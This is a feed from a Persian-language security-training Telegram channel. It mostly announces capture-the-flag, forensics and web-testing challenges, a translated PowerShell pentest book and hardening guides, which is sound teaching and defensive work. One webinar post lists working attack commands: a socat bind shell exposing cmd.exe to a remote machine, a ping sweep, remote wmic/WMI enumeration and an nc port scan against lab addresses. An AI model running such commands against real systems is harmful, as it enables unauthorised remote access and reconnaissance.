securityworld
4.05K subscribers
1.05K photos
14 videos
53 files
1.08K links
آموزش امنیت و تست نفوذ
https://securityworld.ir

@ENITP
Download Telegram
پاورشل برای تست نفوذ - بخش پنجم

✔️ در این بخش به فصل پنجم از کتاب PowerShell for Penetration Testing با عنوان The WEB, REST, and SOAP می‌ پردازیم.


🔴 شما می توانید از طریق لینک زیر ترجمه این فصل از کتاب را دانلود نمایید.

🌐 yun.ir/6ngu62
Forwarded from challenginno.ir
✔️ یکی واحدهای مهم که وجود آن در امنیت بسیار حائز اهمیت است، واحد پاسخگویی به حادثه یا Incident Response است.


تیم Incident Response پس از بررسی های اولیه یک ویندوز 10 به این نتیجه می رسند که احتمالا فردی به این سیستم دسترسی گرفته و سیستم آلوده شده است. به همین دلیل لاگ های Security مربوط به این ویندوز را ذخیره می کنند.


هم اکنون این فایل در اختیار شما قرار دارد و شما می بایست با بررسی این فایل لاگ به سوالات مطرح شده در چالش پاسخ دهید.


🔴 برای مشاهده پنجمین بخش از این مجموعه چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/incident-response-5
securityworld
✔️ سلام و عرض ادب خدمت کلیه دوستان و همراهان گرامی امروز تعداد چالش های موجود در سایت به عدد 100 رسید. این موضوع قطعاً بدون همراهی شما دوستان عزیز امکان پذیر نبود. لذا بر خود لازم می دانیم که از همه دوستانی که در این راه با ما همراه بودند صمیمانه تشکر…
✔️ سلام و عرض ادب خدمت کلیه دوستان گرامی

تخفیف 60 درصدی محصولات تنها تا پایان دی ماه اعتبار داشته و پس از آن با توجه به رویکرد جدید شرکت دهکده امن فناورانه صبا و وب سایت دنیای امنیت، محصولاتی که به صورت فیلم آموزشی در سایت قرار دارند حذف خواهند شد.

🔴 دوستانی که تمایل به خرید این محصولات دارند می توانند تا پایان دی ماه اقدام به خرید نمایند.

🔰 ممنون از لطف و همراهی همه دوستان گرامی

🌐 https://shop.securityworld.ir
Forwarded from challenginno.ir
✔️ رایت آپ مربوط به چالش سرویس های آسیب پذیر - شماره سه هم اکنون در سایت قرار داده شد.

تمرکز این چالش بر روی ایجاد دسترسی اولیه از طریق آسیب پذیری های موجود بر روی سرویس ها می باشد.


🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/blog/initial-access-web-server-vulnerable-service
Forwarded from challenginno.ir
✔️ در این چالش، شما با مجموعه‌ای از ترافیک شبکه مواجه هستید که شامل چند مرحله است.


داده‌های موجود در فایل PCAP نشان‌دهنده یک جریان ارتباطی هستند که شامل تبادل داده‌ها و یک فایل پیوست است.

وظیفه شما تحلیل دقیق این ترافیک و شناسایی یک فلگ مخفی در محتوای یکی از ارتباطات است.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/data-flow-analysis
Forwarded from challenginno.ir
✔️ سلام و عرض ادب خدمت کلیه دوستان و همراهان گرامی

در راستای اهداف پلتفرم Challenginno، دومین رویداد Red/Blue Time در 16 بهمن ماه به صورت وبیناری برگزار خواهد شد.

در بخش اول وبینار به بررسی برخی از حملات سمت کاربر و فرآیندهای Post Exploitation پرداخته شده و در بخش دوم به شناسایی حملات انجام شده خواهیم پرداخت.


🔴 این رویداد به صورت رایگان برگزار شده و شما می توانید برای ثبت نام در این رویداد به لینک زیر مراجعه نمایید.

https://evand.com/events/%D8%AF%D9%88%D9%85%DB%8C%D9%86-%D8%B1%D9%88%DB%8C%D8%AF%D8%A7%D8%AF-red-blue-time-%D8%B3%D8%A7%DB%8C%D8%AA-challenginno-ir-5880?icn=organizer&ici=1
Forwarded from challenginno.ir
✔️ پروتکل HTTP یکی از مهم‌ترین پروتکل‌های اینترنتی است که به‌عنوان استانداردی برای انتقال داده‌ها بین کلاینت (مانند مرورگر وب) و سرور مورد استفاده قرار می‌گیرد.


پروتکل HTTP در زمینه تست نفوذ وب اهمیت بسیار زیادی دارد، زیرا اساس ارتباطات در برنامه‌های وب است و درک دقیق آن برای شناسایی و بهره‌برداری از آسیب‌پذیری‌های امنیتی ضروری است.

در این چالش که به صورت پرسش و پاسخ طراحی شده است، قصد داریم تا شما را با پروتکل HTTP بیشتر آشنا نماییم.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/http-the-definitive-guide
Forwarded from challenginno.ir
✔️ پروتکل HTTP یکی از مهم‌ترین پروتکل‌های اینترنتی است که به‌عنوان استانداردی برای انتقال داده‌ها بین کلاینت (مانند مرورگر وب) و سرور مورد استفاده قرار می‌گیرد.


پروتکل HTTP در زمینه تست نفوذ وب اهمیت بسیار زیادی دارد، زیرا اساس ارتباطات در برنامه‌های وب است و درک دقیق آن برای شناسایی و بهره‌برداری از آسیب‌پذیری‌های امنیتی ضروری است.

در این چالش که به بخش دوم از مباحث مربوط به پروتکل HTTP می پردازیم.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/http-the-definitive-guide-2
Forwarded from challenginno.ir
✔️ یک تحلیل‌گر امنیتی در حال بررسی نفوذ مشکوک به سیستم Windows 10 است. کاربران گزارش داده‌اند که فعالیت‌های غیرعادی مشاهده کرده‌اند، اما هیچ برنامه‌ای به طور واضح در حال اجرا نیست.


شما یک دقیقۀ طلایی (Golden Minute) برای بررسی فایل حافظه و شناسایی تهدید دارید. مهاجم از فایل مخرب استفاده کرده است تا به سیستم دسترسی بگیرد.


وظیفه شما این است که حافظه سیستم را بررسی نموده، فرآیند مخرب را شناسایی کنید و روش ارتباط آن را کشف نمایید.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/memory-forensic
PowerShell for Pentest-Final.pdf
2.7 MB
پاورشل به عنوان یک ابزار قدرتمند در سیستم‌عامل ویندوز، نه تنها برای مدیریت و خودکارسازی وظایف مدیریتی استفاده می‌شود، بلکه مورد توجه متخصصان امنیت نیز قرار گرفته است.

📌 در این کتاب، به بررسی روش‌های مختلف تست نفوذ با پاورشل خواهیم پرداخت. از شناسایی و جمع‌آوری اطلاعات گرفته تا بهره‌برداری و Post-Exploitation، تکنیک‌هایی معرفی خواهند شد که به کارشناسان امنیت کمک می‌کنند تا نقاط ضعف شبکه‌ها و سیستم‌ها را شناسایی کرده و برای بهبود امنیت اقدام کنند.

🔰 لازم به ذکر است که مستند پیش رو، ترجمه بخش‌هایی از کتاب PowerShell for Penetration Testing نوشته Dr. Andrew Blyth است.
Forwarded from challenginno.ir
challenginno.ir
red-blue-02.wmv
✔️ سلام و عرض ادب خدمت کلیه دوستان و همراهان گرامی

در راستای اهداف پلتفرم Challenginno، دومین رویداد Red/Blue Time در 16 بهمن ماه به صورت وبیناری برگزار شد.

فیلم وبینار هم اکنون در دسترس دوستان می باشد.


🔴 ممنون از همه دوستان گرامی که در این وبینار حضور داشتند منتظر اخبار بعدی ما باشید

🌐https://t.iss.one/RedTeamAPT
🌐 https://challenginno.ir
Forwarded from challenginno.ir
challenginno.ir
red-blue-02.wmv
🔴 لیست دستورات مربوط به وبینار دوم Red/Blue Time

`socat - TCP4:192.168.141.157:4447 ---- > on kali with victim ip
--------
`socat -d -d TCP4-LISTEN:4447 EXEC:'cmd.exe',pipes ----> on victim
-----------
for /L %i in (1,1,254) do @ping -n 1 -w 100 192.168.141.%i | find "TTL="
------------
tracert 192.168.141.138
Resolve-DnsName "192.168.141.138"
wmic /node:"192.168.141.138" os get
Get-WmiObject -Class Win32_Share -ComputerName "192.168.141.138"
-------
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
wmic product get name
-------------
C:\Users\OMID\AppData\Roaming\MobaXterm\slash\bin
C:\Users\OMID\AppData\Roaming\MobaXterm\slash\etc\sessionsaliases.sh
`nc -zv 192.168.1.1 80-100`
`pktmon start --capture --comp nics --file-name C:\capture.etl`
`pktmon stop`
`pktmon format C:\capture.etl -o C:\capture.txt`
Forwarded from challenginno.ir
✔️ آسیب‌پذیری SQL Injection یکی از رایج‌ترین و خطرناک‌ترین نقاط ضعف امنیتی در برنامه‌های تحت وب است. این آسیب پذیری زمانی رخ می‌دهد که ورودی‌های کاربر به‌درستی اعتبارسنجی یا فیلتر نشوند و مستقیماً در کوئری‌های SQL استفاده شوند.


در این چالش سعی شده است که به آسیب‌پذیری NoSQL Injection پرداخته شده و دیتابیس MongoDB در آن مورد بررسی قرار داده شود.


این جالش شامل دو مرحله اکسپلویت آسیب‌پذیری به منظور شناسایی فلگ اول و اتصال به دیتابیس جهت استخراج اطلاعات و شناسایی فلگ دوم است.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/no-sqli-njection
Forwarded from challenginno.ir
✔️ یکی واحدهای مهم که وجود آن در امنیت بسیار حائز اهمیت است، واحد پاسخگویی به حادثه یا Incident Response است.


تیم Incident Response پس از بررسی های اولیه بر روی یک سیستم، به این نتیجه می رسد که احتمالا فردی به این سیستم دسترسی گرفته و سیستم آلوده شده است. همچنین برخی از شواهد نشان دهنده دسترسی نفوذگر به اطلاعات داخلی شبکه است. بدین منظور، تیم پاسخگویی به حادثه تصمیم می گیرد تا ترافیک ایجاد شده در یک بازه زمانی را بررسی نماید.


هم اکنون فایل pcap ترافیک در اختیار شما قرار دارد و شما می بایست با بررسی این فایل به سوالات مطرح شده در چالش پاسخ دهید.


🔴 برای مشاهده ششمین بخش از این مجموعه چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/incident-response-6
Forwarded from challenginno.ir
✔️ یک سازمان بزرگ متوجه شده است که یکی از سرورهای ویندوزی آن، علائم فعالیت مشکوک دارد.


تیم امنیتی متوجه شده که برخی از حساب‌های کاربری دارای فعالیت غیرعادی هستند، اما هیچ نشانه‌ای از بدافزار یا ابزارهای شناخته‌شده نفوذ وجود ندارد.


وظیفه‌ی شما این است که ردپای مهاجم را پیدا کنید، نحوه‌ی ورود او را کشف کنید، و اقدامات او را تحلیل کنید.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/windows-forensic/
Forwarded from challenginno.ir
✔️ یک شرکت امنیتی متوجه می‌شود که یکی از کارمندانش که دارای سطح دسترسی بالای هست، فایل‌های حساس را از سیستم خود پاک کرده است.


تیم امنیتی باید مشخص کند که آیا فایل‌های حذف شده بازیابی‌پذیر هستند یا خیر، چه اطلاعاتی در متادیتا باقی مانده و آیا نشانه‌ای از مخفی‌سازی اطلاعات با استفاده از Alternate Data Streams (ADS) یا دیگر تکنیک‌ها وجود دارد.


برای حل این چالش شما می بایست تمامی شواهد در MFT، ADS، Prefetch، Event Logs و تغییرات متادیتا را بررسی نمایید.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/for500
Forwarded from TolueAcademy
پلتفرم شکار تهدید HELK – یک راهکار متن‌باز برای تحلیل امنیتی پیشرفته
--------------------------------------
Hunting ELK (HELK) یکی از اولین پلتفرم‌های متن‌باز برای شکار تهدیدات است که دارای قابلیت‌های تحلیل پیشرفته‌ای مانند SQL، گراف‌سازی، استریم داده‌های ساختاریافته، و یادگیری ماشین از طریق Jupyter Notebooks و Apache Spark بر روی ELK Stack می‌باشد. این پروژه ابتدا برای تحقیقات امنیتی توسعه یافت، اما به دلیل طراحی انعطاف‌پذیر و اجزای اصلی آن، قابلیت استقرار در محیط‌های سازمانی بزرگ را نیز دارد.
ویژگی‌های کلیدی HELK
🔹 تحلیل داده‌های امنیتی پیشرفته

پشتیبانی از SQL برای اجرای کوئری‌های پیشرفته

گراف‌سازی و تحلیل بصری داده‌های امنیتی

پردازش استریمینگ داده‌ها برای تحلیل لحظه‌ای

🔹 یکپارچه‌سازی یادگیری ماشین


قابلیت توسعه مدل‌های تشخیص ناهنجاری

🔹 شکار تهدیدات و تحلیل امنیتی

طراحی‌شده برای شناسایی و بررسی رفتارهای مشکوک مهاجمان

پشتیبانی از قوانین Sigma، چارچوب MITRE ATT&CK و زبان EQL

امکان ساخت و تنظیم قوانین امنیتی سفارشی

کسب اطلاعات بیشتر:

https://github.com/Cyb3rWard0g/HELK
Forwarded from challenginno.ir
✔️ قسمت Authorization Testing یکی از بخش‌های کلیدی در OWASP Web Security Testing Guide یا WSTG است که به بررسی و ارزیابی مکانیزم‌های تعیین سطوح دسترسی و Authorization در برنامه‌های وب می‌پردازد.


آسیب‌پذیری Bypassing Authorization Schema زمانی رخ می‌دهد که یک مهاجم بتواند با دور زدن مکانیزم‌های کنترل دسترسی، به منابع یا عملکردهایی که نباید در دسترس او باشند، دسترسی پیدا کند.


در این چالش که در سه مرحله ایجاد شده است، در هر مرحله شما باید به پنل ادمین برنامه دسترسی پیدا نموده و فلگ را از آن استخراج نمایید.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/bypassing-authorization-schema
✔️ مستند امن‌سازی IIS 10 بر اساس چارچوب CIS شامل مجموعه‌ای از توصیه‌ها و پیکربندی‌های امنیتی است که به سازمان‌ها کمک می‌کند تا سرور Microsoft IIS 10 خود را در برابر تهدیدات سایبری محافظت کنند.


این راهنما شامل تنظیمات امنیتی پیشنهادی برای سرور وب، مدیریت هویت و دسترسی، لاگینگ و نظارت، و کاهش سطح حمله است.


این مستند به عنوان یک استاندارد امنیتی شناخته‌شده، به مدیران شبکه و امنیت امکان می‌دهد تا IIS 10 را مطابق با بهترین شیوه‌های امنیتی تنظیم و ایمن‌سازی کنند.


🔴 برای تهیه این مستند که به صورت فارسی ایجاد شده است لینک زیر مراجعه نمایید:

🌐 yun.ir/9otg6d